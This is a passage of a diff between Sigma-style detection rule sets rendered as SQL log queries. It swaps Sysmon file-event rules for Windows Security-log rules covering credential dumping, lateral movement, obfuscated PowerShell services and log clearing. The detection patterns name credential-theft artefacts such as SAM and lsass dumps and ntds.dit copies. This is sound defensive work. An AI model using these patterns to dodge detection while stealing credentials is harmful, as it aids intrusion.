"win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "Typical HiveNightmare SAM File Export", - "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects files written by the different tools that exploit HiveNightmare", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ 
"attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1003.004" ], "falsepositives": [ - "Files that accidentally contain these strings" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", - "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "GatherNetworkInfo.VBS Reconnaissance Script Output", - "id": "f92a6f1e-a512-4a15-9735-da09e78d7273", - "status": "experimental", - "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", - "author": 
"Nasreddine Bencherchali (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Hotfixinfo.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\netiostate.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sysportslog.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VmSwitchLog.evtx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_lolbin_gather_network_info_script_output.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Screensaver Binary File Creation", - "id": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "title": "Suspicious Remote Logon with Explicit Credentials", + "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable 
(PE) files with a .scr file extension\n", - "author": "frack113", + "description": "Detects suspicious processes logging on with explicit credentials", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.002" + "attack.t1078", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Administrators that use the RunAS command or scheduled tasks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Kindle.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects 
service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": 
"file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": 
"c3edc6a5-d9d4-48d8-930e-aab518390917", - "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "status": "test", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + 
"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "status": "test", - "description": "Detects the creation of recent element 
file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Domain Controllers acting as printer servers too? :)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.initial_access", + 
"cve.2023.23397" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects 
suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "Unauthorized System Time Modification", + "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "author": "@neu5ron", "tags": 
[ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Unknown" + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_susp_time_modification.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet 
Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate add-ins" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "status": "test", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", 
